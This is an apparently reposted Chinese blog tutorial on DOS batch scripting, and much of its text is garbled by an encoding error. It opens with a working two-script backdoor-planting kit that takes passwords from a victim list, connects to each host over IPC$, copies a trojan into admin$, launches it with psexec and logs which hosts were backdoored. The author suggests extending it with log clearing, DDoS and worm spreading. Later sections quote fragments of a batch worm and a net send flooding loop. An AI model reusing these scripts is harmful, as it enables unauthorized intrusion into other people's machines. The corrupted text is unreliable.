主要命��o也只有一条：�Q�在批处理文件中使用 FOR 命��o�Ӟ��指定变量使用 %%variable�Q?br /> @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokens的用法请参见上面的sample1�Q�在�q�里它表�C�按��序��victim.txt中的内容传递给door.bat中的参数%i %j %k�?br /> 而cultivate.bat无非��是用net use命��o来徏立IPC$�q�接�Q��ƈcopy木马�Q�后门到victim�Q�然后用�q�回码（If errorlever =�Q�来�{�选成功种植后门的��L��Q��ƈecho出来�Q�或者echo到指定的文�g�?br /> delims= 表示vivtim.txt中的内容是一�I�格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根�?%i %%j %%k表示的对象来排列�Q�一般就�?ip password username�?br /> 代码雏�Ş�Q?br />
--------------- cut here then save as a batchfile(I call it main.bat ) --------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) --------------------

------------------- cut here then save as a batchfile(I call it door.bat) -----------------
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@p***ec \\%1 c:\winnt\system32\windrv32.exe
@p***ec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) -------------------
�q�只是一个自动种植后门批处理的雏形，两个批处理和后门�E�序�Q�Windrv32.exe�Q?PSexec.exe需攑֜��l�一目录�?批处理内�?br /> ��可扩展,例如:加入清除日志+DDOS的功�?加入定时��d��用户的功�?更深入一点可以��之具备自动传播功�?蠕虫).此处不多做叙�q?有兴��的朋友可自行研�I?/p>

九宝 2009-06-01 15:52 发表评论

(�? �l�典的DOS批处理入门教�E?1)�Q�徏议耐心看完�Q�必有收��P��

九宝 — Mon, 01 Jun 2009 07:50:00 GMT
关键�? dos批处�?自动化安装测�?/strong>

目前在做自动化安装测试的�q�程中要用到大量dos批处理的应用�Q�所以脓一��?br />

很好的DOS批处理入门教�E?呵呵�?/span>

�q�是一��技术教�E�，我会用很��单的文字表达清楚自己的意思，你要你识字就能看懂，��p��学到知识。写�q�篇教程的目的，是让每一个看�q�这些文字的朋友��C��一句话�Q�如果爱可以让事情变的更��单，那么��p��它简单吧�Q�看�q�篇教程的方法，��是慢！慢慢的，如同品一个女人、一杯茗�Ӟ��你会发现很多以前��在眼前的东西突然变的很遥远�Q�而有些很遥远的东西却又突然回��C��眼前�?br />
先概�q�C��下批处理是个什么东东。批处理的定义，至今我也没能�l�出一个合适的----众多高手们也都没�l�出----反正我不知道----看了我也不一定信�?----我是个菜鸟，当然��更不用说了�Q�但我想�ȝ��Z��?#8220;比较合适的”�Q�而且我也�怿�自己可以把它解释的很清楚�Q�让更多的菜鸟都知道�q�是个什么东东，你用�q�个东东可以�q�什么事情。或�怽�会因��文章�?#8220;无条件爱上批处理”�Q�那么我的目的就辑ֈ��?---我就是要让你�׃��它，我就�q�么拽，你能怎么着�Q�？真的�Q�爱有时候就�q�么拽，��是�q�么没理由，��是�q�么不要脸！真的�Q?br />
按照我的理解�Q�批处理的本质，是一堆DOS命��o按一定顺序排列而�Ş成的集合�?br />
OK,never claver and get to business�Q�闲话少说言归正传）。批处理�Q�也�U�Cؓ批处理脚本，英文译�ؓBATCH�Q�批处理文�g后缀BAT��取的前三个字母。它的构成没有固定格式，只要遵守以下�q�条��ok了：每一行可视�ؓ一个命令，每个命��o里可以含多条子命令，从第一行开始执行，直到最后一行结束，它运行的�q�_��是DOS。批处理有一个很鲜明的特点：使用方便、灵�z�，功能强大�Q�自动化�E�度高。我不想让自己写的教�E�枯燥无呻I��因�ؓ�늼��C��码（批处理的内容��是代码吧？�Q�的问题本来��是枯燥的，很少有�h能面�Ҏ��屏幕的代码而静下心来。所以我会用很多��单实用的例子让读�q�篇教程的朋友去体会批处理的那四��的��力�Q�感受它那古�늲�怪的性格�Q�不知不觉中�׃��批处理（晕，怎么又是爱？到底批处理和爱有什么关�p�？�{�案�Q�没有！�Q�。再说句“闲话”�Q�要学好批处理，DOS基础一定要牢！当然脑子灉|��也是很重要的一斚w��?br />
例一、先�l�出一个最easy的批处理脚本让大家和它�؜个脸熟，��下面的几行命��o保存为name.bat然后执行�Q�以后文中只�l�出代码�Q�保存和执行方式�c�M��Q�：

ping sz.tencent.com > a.txt
ping sz1.tencent.com >> a.txt
ping sz2.tencent.com >> a.txt
ping sz3.tencent.com >> a.txt
ping sz4.tencent.com >> a.txt
ping sz5.tencent.com >> a.txt
ping sz6.tencent.com >> a.txt
ping sz7.tencent.com >> a.txt
exit

是不是都能看的懂�Q�是不是很easy�Q�但它的作用却是很实用的�Q�执行这个批处理后，可以在你的当前盘建立一个名为a.txt的文�Ӟ��它里面记录的信息可以帮助你迅速找到速度最快的QQ服务器，从而远��?#8220;从服务器中�{”那一痛苦的过�E�。这�?gt;的意思，是把前面命��o得到的东西放到后面所�l�的地方�Q?gt;>的作用，�?gt;的相同，区别是把�l�果�q�加到前一行得出的�l�果的后面，具体的说是下一行，而前面一行命令得出的�l�果��保留，�q�样可以使这个a.txt文�g��来��大�Q�想到如何搞破坏了？�Q�）。By the way�Q�这个批处理�q�可以和其他命��o�l�合�Q�搞成完全自动化判断服务器速度的东东，执行后直接显�C�速度最快的服务器IP�Q�是不是很爽�Q�后面还��详�l�介�l��?br />
例二、再�l�出一个已�l�过时的例子�Q�a.bat�Q�：

@echo off
if exist C:\Progra~1\Tencent\AD\*.gif del C:\Progra~1\Tencent\AD\*.gif
a.bat

��Z��么说�q�是个过时的例子呢？很简单，因�ؓ现在已经几乎没有人用带广告的QQ了（KAO�Q�我的QQ�q�显�C�好友三围呢�Q�！�Q�，所以它几乎用不上了。但曄��它的作用是不可小�H�的�Q�删除QQ的广告，让对话框�q�干净净。这里用的地址是QQ的默认安装地址�Q�默认批处理文�g名�ؓa.bat�Q�你当然可以�Ҏ��情况自行修改。在�q�个脚本中��用了if命��o�Q��得它可以辑ֈ�适时判断和删除广告图片的效果�Q�你只需要不关闭命��o执行后的DOS�H�口�Q�不按CTRL+C��l�止命��o�Q�它��׃��直监视是否有�q�告囄��Q�QQ也再不断查看自己的广告是否被删除�Q�。当然这个脚本占用你一点点内存�Q�呵��c�?br />
例三�Q��用批处理脚本查是否中冰河。脚本内容如下：

@echo off
netstat -a -n > a.txt
type a.txt | find "7626" && echo "Congratulations! You have infected GLACIER!"
del a.txt
pause & exit

�q�里利用了netstat命��o�Q�检查所有的�|�络端口状态，只需要你清楚常见木马所使用的端口，��p��很easy的判断出来是否被人种了冰沟뀂然�q�不是确定的�Q�因为冰河默认的端口7626�Q�完全可以被��Z��攏V��这里介�l�的只是�Ҏ��和思�\。这里介�l�的是方法和思�\�E�做改动�Q�就变成可以��查其他木马的脚本了，再改动一下，加进��d��数和端口及信息列表文件后�Q�就变成自动��所有木马的脚本了。呵呵，是不是很�q�瘾�Q�脚本中�q�利用了�l�合命��o&&和管道命令|�Q�后面将详细介绍�?br />
例四�Q�借批处理自动清除�pȝ��垃圾�Q�脚本如下：

@echo off
if exist c:\windows\temp\*.* del c:\windows\temp\*.*
if exist c:\windows\Tempor~1\*.* del c:\windows\Tempor~1\*.*
if exist c:\windows\History\*.* del c:\windows\History\*.*
if exist c:\windows\recent\*.* del c:\windows\recent\*.*

��以上脚本内容保存到autoexec.bat里，每次开机时��把�pȝ��垃圾�l�自动删除了。这里需要注意两点：一、DOS不支持长文�g名，所以就出现了Tempor~1�q�个东东�Q�二、可�Ҏ��自己的实际情况进行改动，使其�W�合自己的要求�?br />
怎么��P��看到�q�里�Q�你�Ҏ��处理脚本是不是已�l�有点兴��了�Q�是不是发现自己已经慢慢�׃��了这个东东？别高兴的太早�Q�爱不是一件简单的事，它也许能带给你快乐和�q�福�Q�当然也能让你痛苦的惛_��x��。如果你知道很难�q�敢�l�箋的话�Q�I 服了 YOU�Q��l�努力吧�Q�也许到最后你不一定得到真爱（真的有这可能�Q�爱�q�的人都知道�Q�，但你可以体会到整个爱的过�E�，��是如此。酸、苦和��G�Q�有没有甜天知道�?br />
��Z��么会把批处理和爱情扯上关�p�？不是我无聊，也不是因��样写有趣多少�Q�原因有二：其一�Q�批处理和爱情有很多相同的地方，有些地方我用“专业”的行话解释不清（我不怀疑自��q��表达能力�Q�而是事情本��n��׃��好说清楚�Q�，说了=没说�Q�但用地球�h都知道的爱情一比喻�Q�爱情是什么？�?*怎么知道�Q�！�Q�，没准你心里一下就亮堂了，事半功倍，何乐而不为？其二�Q�我�q�段旉��状态不是很好，感冒发烧头疼��d��Q�但主要�q�是感情上精��摧�D�，搞的人烦透了�Q�借写教程之际感慨几句�Q�大家就全当买狗皮膏药了�Q�完全可以省略不看（也许�q�真有点效果----不至于让你看着看着��q��着了，把头��了来找我报销医药费）。说不定下次的教�E�中大家�q�会看到杨过、张无忌�{�金老前辈笔下的英雄们�?br />
看过�W�一章的朋友�Q�一定对批处理有了初步的印象�Q�知道它到底是用来干什么的了。但你知道运用批处理的精髓在哪里吗？其实很简单：思�\要灵�z�！没有做不到的�Q�只有想不到的。这和爱情就有点不同了，因�ؓ爱情的世界是两个人的世界�Q�一厢情愿不叫爱情（补充�Q�那叫单恋。废话！�Q�而批处理却是一个�h的天堂，你可以�ؓ所�Ʋ�ؓ�Q�没有达不到的境界！

批处理看��h��杂�ؕ无章�Q�但它的逻辑性之强，�l�对不比其他�E�序语言�Q�如汇编�Q�低�Q�如果你写的脚本是一堆�ؕ麻，虽然每一行命令都正确�Q�但从头执行到尾后，不一定得��C��惌��的结果，也许是一屏幕的Bad command or fail name。这又和爱情有了共同点：按步骤来�l�营�Q�缺��或增多的步骤都可能��D��不想看见的结果。陷入爱河的朋友�Q�相信没有不肯定�q�句话的。我的爱情批处理�Q�输出的�l�果不是Bad command or fail name�Q�屏�q�是�q�么昄��的：‘你的爱情’不是内部或外部命令，也不是可�q�行的程序或批处理文件。然后就是光标不停闪动，�{�待�q�下一�ơ错误的输入�?br />
从这一章开始，��由��入��q��介绍批处理中常用的命令，很多常见DOS命��o在批处理脚本中有�q�广泛的应用�Q�它们是批处理脚本的BODY部分�Q�但批处理比 DOS更灵�z�d��P��更具备自动化。要学好批处理，DOS一定要有比较扎实的基础。这里只讲述一些比较少用（相对来说�Q�的DOS命��o�Q�常用命令如COPY�?DIR�{�就不做介绍了（�q�些看似��单的命��o实际复杂的很�Q�我怕自己都说不清楚�Q�）�?br />
例五�Q�先看一个实例。这是一个很有意思的脚本�Q�一个小巧实用的好东东，把批处理“自动�?#8221;的特点体现的淋漓��致。先介绍一下这个脚本的来历�Q�大安��知道汇编�E�序�Q�MASM�Q�的上机�q�程�Q�先要对源代码进行汇�~�、连接，然后再执行，而这中间有很多环节需要输入很多东西，�ȝ��的很�Q�只有经历过的朋友才懂得�Q�。如何�ɘq�个�q�程变的��单呢�Q�在我们搞汇�~�课�E�设计时�Q�我“被�?#8221;写了�q�个脚本�Q�用��h��很爽�Q�呵��c��看看脚本内容：

@echo off
::close echo
cls
::clean screen
echo This programme is to make the MASM programme automate
::display info
echo Edit by CODERED
::display info
echo Mailto me : qqkiller***@sina.com
::display info
if "%1"=="" goto usage
::if input without paramater goto usage
if "%1"=="/?" goto usage
::if paramater is "/?" goto usage
if "%1"=="help" goto usage
::if paramater is "help" goto usage
pause
::pause to see usage
masm %1.asm
::assemble the .asm code
if errorlevel 1 pause & edit %1.asm
::if error pause to see error msg and edit the code
link %1.obj & %1
::else link the .obj file and execute the .exe file
:usage
::set usage
echo Usage: This BAT file name [asm file name]
echo Default BAT file name is START.BAT
::display usage

先不要被�q�一堆的东西�l�吓怕了�Q�静下心来仔�l�的看（回想一下第一章中�W�一�D�|��怎么写的�Q�！�Q�。已�l�给��Z��每一行命令的解释�Q�两个冒号后面的内容为前一行内容解释的E文（��x��E文的朋友也不用担心，都很easy�Q�一看就懂了�Q�实在不懂了不会查词典啊�Q�这么懒�Q�）�Q�在脚本执行时不昄��Q�也不�v��M��作用。倒数�W?5行行首有一个冒��P��可不是笔误哦�Q�具体作用后面会详细讲到。此脚本中masm和link是汇�~�程序和�q�接�E�序�Q�必��d��edit�E�序以及你要�~�辑的源代码�Q�当然还有这个脚本，废话�Q�）一起在当前目录中。��用这个批处理脚本�Q�可以最大可能的减少手工输入�Q�整个过�E�中只需要按几下回�R键，卛_��实现从汇�~�源代码到可执行exe文�g的自动化转换�Q��ƈ具备��判断功能�Q�如果汇�~�时源代码出现错误（汇编不成功）�Q�则自动暂停昄��错误信息�Q��ƈ在按��L��键后自动�q�入�~�辑源代码界面；如果源代码汇�~�成功，则进行连接，�q�在�q�接后自动执行生成的exe文�g。另外，�׃��批处理命令的��单性和灉|��性，�q�个脚本�q�具备良好的可改�q�性，��单进行修改就可以�W�合不同朋友的上��Z��惯。正在学汇编的朋友，一定别忘了实习一下！

在这个脚本中出现了如下几个命令：@、echo�?:、pause�?和goto�?以及if。而这一章就��讲�q�这几个命��o�?

1、@

�q�个�W�号大家都不陌生�Q�email的必备符��P��它怎么会跑到批处理中呢�Q�呵呵，不是它的错，批处理本来就��M��开它，要不��׃��完美了。它的作用是让执行窗口中不显�C�它后面�q�一行的命��o本��n�Q�多么绕口的一句话�Q�）。呵呵，通俗一点说�Q�行首有了它的话�Q�这一行的命��o��׃��昄��了。在例五中，首行的@echo off中，@的作用就是让脚本在执行时不显�C�后面的echo off部分。这下懂了吧�Q�还是不太懂�Q�没关系�Q�看完echo命��o��介，自然��懂了�?br />
2、echo

中文�?#8220;反馈”�?#8220;回显”的意思。它其实是一个开兛_��令，��是说它只有两种状态：打开和关闭。于是就有了echo on和echo off两个命��o了。直接执行echo命��o��显�C�当前echo命��o状态（off或on�Q�执行echo off��关闭回显，它后面的所有命令都不显�C�命令本�w�，只显�C�执行后的结果，除非执行echo on命��o。在例五中，首行的@命��o和echo off命��o联合��h��Q�达��C��两个目的�Q�不昄��echo off命��o本��n�Q�不昄��以后各行中的命��o本��n。的��是有点乱，但你要是�l�习一下的话，3分钟包会�Q�不会的退钱！

echo命��o的另一�U�用法一�Q�可以用它来昄��信息�Q�如例五中倒数�W�二行，Default BAT file name is START.BAT��在脚本执行后的�H�口中显�C�，而echo命��o本��n不显�C�（��Z��么？�Q�）�?br /> echo命��o的另一�U�用法二�Q�可以直接编辑文本文件。例六：
echo nbtstat -A 192.168.0.1 > a.bat
echo nbtstat -A 192.168.0.2 >> a.bat
echo nbtstat -A 192.168.0.3 >> a.bat

以上脚本内容的编辑方法是�Q�直接是命��o行输入，每行一回�R。最后就会在当前目录下生成一个a.bat的文�Ӟ��直接执行��׃��得到�l�果�?br />
3�?:

�q�个命��o的作用很��单，它是注释命��o�Q�在批处理脚本中和rem命��o�{�效。它后面的内容在执行时不昄��Q�也不�v��M��作用�Q�因为它只是注释�Q�只是增加了脚本的可��L��，和C语言中的/*…………*/�c�M��。地球�h都能看懂�Q�就不多说了�?br />
4、pause

中文�?#8220;暂停”的意思（看看你的workman上）�Q�我一直认为它是批处理中最��单的一个命令，单纯、实用。它的作用，是让当前�E�序�q�程暂停一下，�q�显�C�Z��行信息：��h��L��键��l? . .。在例五中这个命令运用了两次�Q�第一�ơ的作用是让使用者看清楚�E�序信息�Q�第二个是显�C�错误的汇编代码信息�Q�其实不是它��x��C�，而是masm�E�序在显�C�错误信息时被暂它停了，以便让你看清楚你的源代码错在哪里�Q��?br />
5�?和goto

��Z��么要把这两个命��o联合��h��介绍�Q�因为它们是分不开的，无论��了哪个或多了哪个都会出错。goto是个跌��{命��o�Q?是一个标�{�。当�E�序�q�行到goto �Ӟ��自动蟩转到:定义的部分去执行了（是不是分不开�Q�）。例五中倒数�W?行行首出��C��?�Q�则�E�序在运行到goto时就自动跌��{�?标签定义的部分执行，�l�果是显�C��本usage�Q�usage��是标签名称�Q�。不隄��出，goto命��o��是�Ҏ��q�个冒号和标�{�֐��U�来��L��它该跌��{的地方，它们是一一对应的关�p�R��goto命��o也经常和if命��o�l�合使用。至于这两个命��o具体用法�Q�参照例五�?br />
goto命��o的另一�U�用法一�Q�提前结束程序。在�E�序中间使用goto命��o跌��{到某一标签�Q�而这一标签的内容却定义为退出。如�Q?br />
……
goto end
……
:end

�q�里:end在脚本最后一行！其实�q�个例子很弱智，后面讲了if命��o和组合命令你��q��道了�?br />
6�?

�q�个癑ֈ�号严格来说是��不上命令的�Q�它只是批处理中的参数而已�Q�多�?一起��用的情况除外�Q�以后还��详�l�介�l�）�Q�但千万别以为它只是参数��小看了它（看看例五中有多少地方用到它？�Q�，��了它批处理的功能就减少�?1%了。看看例七：

net use \\%1\ipc$ %3 /u:"%2"
copy 11.BAT \\%1\admin$\system32 /y
copy 13.BAT \\%1\admin$\system32 /y
copy ipc2.BAT \\%1\admin$\system32 /y
copy NWZI.EXE \\%1\admin$\system32 /y
attrib \\%1\admin$\system32\10.bat -r -h -s

以上代码是Bat.Worm.Muma病毒中的一部分�Q?1代表的IP�Q?%代表的username�Q?%代表password。执行�Ş式�ؓ�Q�脚本文件名参数一参数�?……。假设这个脚本被保存为a.bat�Q�则执行形式如下�Q�a IP username password。这里IP、username、password是三个参敎ͼ��~�Z��不可�Q�因为程序不能正��运行，�q�不是因为少了参数语法就不对�Q�这样在脚本执行�q�程中，脚本��p��动用用你的三个参��C��ơ（��C��Q�是依次�Q�也是一一对应的关�p�R��）代换1%�?%�?%�Q�这样就辑ֈ�了灵�z�运用的目的�Q�试惻I��如果在脚本中直接把IP、username和password都定义死�Q�那么脚本的作用也就被固定了�Q�但如果使用%的话�Q�不同的参数可以辑ֈ�不同的目的，是不是更灉|��Q�）�?br />
关于�q�个参数的��用，在后�l�章节中�q�将介绍。一定要非常熟练才行�Q�这需要很多练习过�E�，需要下点狠工夫�Q?br />
�q�一章就写到�q�里了。可能有朋友问了�Q�怎么没介�l�if命��o�Q�呵呵，不是我忘了，而是它不�Ҏ��说清楚，下一章再讲了�Q�这一章讲的这点东西，如果你是初学者，恐怕也够消化的了。记住一句话�Q�DOS是批处理的BODY�Q��Q何一个DOS命��o都可以被用在批处理脚本中��d��成特定的功能。到�q�里�Q�你是否已经惛_��了用自己肚子里的东西��d��点带有自动化色彩的东东呢�Q�很��单，��是一个DOS命��o的集合而已�Q�相信自�U�Cؓ天才的你已经会把计算机等�U�考试上机试题中的DOS部分用批处理来自动化完成了�?br />
烦！��好象一个半老女人到了更�q�期�Q�什么事都想唠叨几句�Q�什么事都感��C��舒服�Q�看谁谁不爽。明知山有虎�Q�偏向虎��p��Q�最后留下一�w�伤痕无功而返�Ӟ��才发现自��q��然如此脆弱，如此渺小�Q�如此不堪一凅R��徘徊在崩溃的边�~�，�H�然回想起了自己最后一�ơ扁人的那一刻，�q�真有点怀念（其实我很不喜�Ƣ扁人，更不喜欢被�h扁）。我需要发泄，我用手指拼命的敲打着键盘�Q�在一阉|��一阉|��节奏的声音中�Q�屏�q�上出现了上面的�q�些文字。可��N��q�就是发泄的另一�U�方式吗�Q�中国�h�q�是厉害�Q�早在几千年前孔老夫子就说过“唯女子与��h�Q�难��M��”�Q�真**有先见之明，佩服�Q�虽然是在发泄，不过大家��h��心，以我的脾气，既然军_��写这��教�E�，��׃��定会��力��d��好，写完��，�l�对不给自己留下遗憾�Q�要不这教程��׃��是我写的�Q?br />
曄��有一��经典的批处理教�E�出现在你的屏幕上，你没有保存，直到找不到它的链接你才后悔莫及，��Z��间最大的痛苦莫过于此。如果上天能�l�你一个再看一�ơ的��Z��Q�你会对那篇教程说三个字�Q�我�׃��Q�如果非要给�q�䆾爱加上一个期限，你希望是100�q�。因�?00�q�后�Q�你恐怕早已经挂了�Q�而现在，你的屏幕上出��C��q�篇你正在看的批处理教程�Q�虽然不如你曄��看的那篇�l�典�Q�但如果勉强�q�过的去。你会爱它吗�Q�时间会�?0�q�那么长吗？�{�案是：试试看吧�?

批处理脚本中最重要的几个命令，��在�q�一章详�l�介�l�，但是很遗憾，有些�l�节到现在我都没掌握的很好，甚至�q�有些生分。如同还不太懂得�׃��栗��但我一直都在努力，即��一直都没有收获。所以可能讲的会比较�W�统�Q�但我会告诉你方法，剩下的就是时间问题了�Q�需要自己去��练。让我们共同努力吧。冰��M��非一日之寒，滴水�I�石非一日之功。有些事情，比如学批处理�Q�比如爱一个�h�Q�都是不能速成的，甚至�q�会有付��辛而收获�ؓ甚微的情��c��再�ơ重画I��看这��教�E�的时候，一定要静下心来�Q�除非你已经掌握了这��教�E�的所有东�?---但那也就不必看了�Q�浪�Ҏ��_��

7、if

接上一章，接着讲if命��o。�ȝ��来说�Q�if命��o是一个表�C�判断的命��o�Q�根据得出的每一个结果，它都可以对应一个相应的操作。关于它的三�U�用法，在这里分开讌Ӏ?

(1)、输入判断。还是用例五里面的那几句吧：

if "%1"=="" goto usage
if "%1"=="/?" goto usage
if "%1"=="help" goto usage

�q�里判断输入的参数情况，如果参数为空�Q�无参数�Q�，则蟩转到usage�Q�如果参��Cؓ/?或help�Ӟ��大家一般看一个命令的帮助�Q�是不是输入�??�?help呢，�q�里�q�么做只是�ؓ了让�q�个脚本看�v来更像一个真正的�E�序�Q�，也蟩转到usage。这里还可以用否定�Ş式来表示“不等�?#8221;�Q�例如：if not "%1"=="" goto usage�Q�则表示如果输入参数不�ؓ�I�就跌��{到usage�Q�实际中�q�样做就没意义了�Q�这里介�l�用法，��不了那么多了，呵呵。）是不是很��单？其实��译成中文体会一下就understand了�?

(2)、存在判断。再看例二里�q�句�Q?

if exist C:\Progra~1\Tencent\AD\*.gif del C:\Progra~1\Tencent\AD\*.gif

如果存在那些gif文�g�Q�就删除�q�些文�g。当然还有例四，都是一��L��道理。注意，�q�里的条件判断是判断存在的，当然也可以判断不存在的，例如下面�q�句“如果不存在那些gif文�g则退��?#8221;�Q�if not exist C:\Progra~1\Tencent\AD\*.gif exit。只是多一个not来表�C�否定而已�?

(3)、结果判断。还是拿例五开刀�Q�没惛_��自己写的脚本�Q�竟然用处这么大�Q�呵呵）�Q?

masm %1.asm
if errorlevel 1 pause & edit %1.asm
link %1.obj

先对源代码进行汇�~�，如果��p�|则暂停显�C�错误信息，�q�在按�Q意键后自动进入编辑界面；否则用link�E�序�q�接生成的obj文�g。这里只介绍一下和if命��o有关的地方，&命��o后面会讲到。这�U�用法是先判断前一个命令执行后的返回码�Q�也叫错误码�Q�DOS�E�序在运行完后都有返回码�Q�，如果和定义的错误码符合（�q�里定义的错误码�?�Q�，则执行相应的操作�Q�这里相应的操作为pause & edit %1.asm部分�Q��?

另外�Q�和其他两种用法一��P��q�种用法也可以表�C�否定。用否定的�Ş式仍表达上面三句的意思，代码变�ؓ�Q?br /> masm %1.asm
if not errorlevel 1 link %1.obj
pause & edit %1.asm

看到本质了吧�Q�其实只是把�l�果判断后所执行的命令互换了一下，“if not errorlevel 1”�?#8220;if errorlevel 0”的效果是�{�效的，都表�C�Z��一句masm命��o执行成功�Q�因为它是错误判断，而且�q�回码�ؓ0�Q?��p��C�否定，��是说这个错误不存在�Q�就是说masm执行成功�Q�。这里是否加not�Q�错误码到底�?�q�是1�Q�是值得考虑的两个问题，一旦搭配不成功脚本��p��定出错，所以一定要体会的很深刻才行。如何体会的深刻�Q�练习！自己写一个脚本，然后把有not和没有not的情况，�q�回码�ؓ0�?的情况分别写�q�去执行�Q�怎么�Q�嫌�ȝ��啊？排列�l�合��一下才四中情况你就嫌麻烦了�Q�后面介�l�管道命令和�l�合命��o时还有更�ȝ��的呢�Q�怕了�Q�呵��c��）�Q�这样从执行的结果中��p��很清楚的看出�q�两�U�情�늚�区别�?

�q�种用errorlevel�l�果判断的用法是if命��o最隄��用法�Q�但也恰恰是最有用的用法，如果你不会用errorlevel来判断返回码�Q�则要达到相同的效果�Q�必��ȝ��else来表�C?#8220;否则”的操作，是比较麻烦的。以上代码必��d��成：

masm %1.asm
if exist %1.obj link %1.obj
else pause & edit %1.asm

关于if命��o的这三种用法��say到这里，理解很简单，但应用时��׃��一定用的那么得心应手，主要是熟�l�程度的问题。可能有的朋友有�Ҏ��Ӟ��我怎么没给出类��g��面三行的用法介绍�Q�是因�ؓ下面三行是if命��o帮助里对它自�w�用法的解释�Q��Q何�h只要一�?#8220;if /?”��p��看到�Q�我没有必要在这里多费口舌；更重要的原因�Q�是我觉得这样介�l�的不清楚，看的��Z��一定看的懂�Q�所以我采用上面自己对if命��o的理解来介绍。一定要注意的是�Q�这三种用法的格式各不相同，而且也是不能改变的，但实际上可以互换�Q�以��Z��本质上讲�Q�这三种用法都是建立在判断的基础上的�Q�哲学教我们学会透过现象看事物本质！�Q�。有兴趣的朋友可以自��q��I�一下�?

IF [NOT] ERRORLEVEL number do command
IF [NOT] string1==string2 do command
IF [NOT] EXIST filename do command
8、call

学过汇编或C的朋友，肯定都知道call指��o表示什么意思了�Q�在�q�里它的意思其实也是一��L��。在批处理脚本中�Q�call命��o用来从一个批处理脚本中调用另一个批处理脚本。看例八�Q�默认的三个脚本文�g名分别�ؓstart.bat�?0.bat和ipc.bat�Q�：

start.bat�Q?
……
CALL 10.BAT 0
……

10.bat�Q?
……
ECHO %IPA%.%1 >HFIND.TMP
……
CALL ipc.bat IPCFind.txt

ipc.bat�Q?
for /f "tokens=1,2,3 delims= " %%i in (%1) do call HACK.bat %%i %%j %%k

有没有看��Z��么不对的地方�Q�没看出来啊�Q�没看出来就对了�Q�其实就没有不对的地方嘛�Q�你怎么看的出来�Q�从上面两个脚本�Q�你可以得到如下信息�Q?、脚本调用可以灵�z�运用，循环�q�用、重复运用�?、脚本调用可以��用参敎ͼ�关于�W�一点就不多说了�Q�聪明的你一看就应该会，�q�里说一下第二点�?

在start.bat中，10.bat后面跟了参数0�Q�在执行时的效果�Q�其实就是把10.bat里的参数%1�?代替。在start.bat 中，ipc.bat后面跟了参数ipcfind.txt�Q�一个文�Ӟ��也可以做参数�Q�，执行时的效果�Q�就是用ipc.bat中的每一行的三个变量�Q�这里不懂没关系�Q�学�q�for命��o后就懂了�Q�，对应代换ipc.bat中的%%i�?%j�?%k。这里参数调用是非常灉|��的，使用旉��要好好体会。在初学期间�Q�可以先学习只调用脚本，至于�q�脚本的参数一起��用的情况�Q�在后面的学习中自然��׃��有比较深�ȝ��理解�Q�这是因为当你已�l�可以灵�z�运用批处理脚本后，如何使代码写的更�_��更完��更高效��p��然包括到了考虑的范��_��q�时候你��׃��发现在调用脚本时直接加入参数�Q�可以��代码效率加倍。By the way�Q�上面的�q�几个脚本，都是Bat.Worm.Muma病毒的一部分�Q�在后面的教�E�里�Q�大家将有机会见到这个病毒的真面目�?br /> 那是不是��_��在同一个目录下臛_��存在两个批处理脚本文�Ӟ��只有一个你调用谁？�Q�？呵呵�Q�注意了�Q�这句话错了�Q�！只有一个照样可以调�?---调用自��n�Q�看例九�Q�默认脚本文件名a.bat�Q�：

net send %1 This is a call example.
call a.bat

�q�两句一�l�合�Q�效果自然不怎么��P��因�ؓ只有一台机器来发消息，谁怕谁啊？我给你来个礼��往来！可如果有100台机器同时执行，而且每台机器开10和窗口同时向一个目标机器发消息的话�Q�呵��c��这里call a.bat的作用就是调用自�w�，执行完前一句net send命��o后再调用自��n�Q�达��C��循环执行的目的�?

�l�出一个很有意思的脚本�Q�有兴趣的朋友可以实验一下。例十（默认脚本文�g名�ؓa.bat�Q�：

call a.bat

一定要在DOS�H�口下执行，否则只会看到一个窗口一闪而过�Q�看不到最后结果。等执行完后�Q�当脚本被执行了1260�ơ，别忘了想一下到底是��Z��么！爱情有时候跟�q�个脚本一��P��一旦陷入死循环�Q�最后的�l�果都是意想不到的。只是爱情，�l�对不会�{�到被毫无理��q��循环�q�么多次�Q�也许在�W�三�ơ时��出��C��love is aborted的提�C��?

9、find

�q�是一个搜索命令，用来在文件中搜烦特定字符�Ԍ��通常也作为条件判断的铺垫�E�序�Q�我怎么�H�然惌��v了这四个字？�Q�。这个命令单独��用的情况在批处理中是比较��见的，因�ؓ没什么实际意义。还是借例三来说明�Q?

@echo off
netstat -a -n > a.txt
type a.txt | find "7626" && echo "Congratulations! You have infected GLACIER!"
del a.txt
pause & exit

先用netstat命��o��查是否有冰河默认的端�?626在活动，�q�把�l�果保存到a.txt中。然后��用type命��o列出a.txt中的内容�Q�再在列出的内容中搜索字�W�串“7626” �Q�发现有的话则提�C�Z��了冰治I��否则退出。看�Q�find命��o其实��p��么简单，但有一点必��要注意刎ͼ�如果不��用type命��o列出a.txt中的内容�Q�而是直接使用find命��o在a.txt中找“7626”�Q�find a.txt "7626" && echo "Congratulations! You have infected GLACIER!"�Q�，��必��d��l�出�q�个a.txt的绝对�\径（我试�q�了�Q�find�q�没有默认�\径就是当前�\径的功能�Q�必��L��动指定。也许是我错了，�Ƣ迎指正�Q�。因为在find命��o的帮助里有这么一句话�Q�如果没有指定�\径，find��搜索键入的或者由另一个命令��生的文字。这里的“另一个命�?#8221;自然��指�?type命��o了�?

至于find命��o的其他几个参数如v、n、i�{�，有兴��的朋友自己�ȝ��I�吧�Q�这已经属于DOS学习的内容了�Q�这里就不做介绍。关于find命��o和其他命令的一些更�_�֦�的用法（有些��直��o人叫�l�）�Q�后�l�的教程中将介绍�Q�希望关注�?

10、for、set、shift

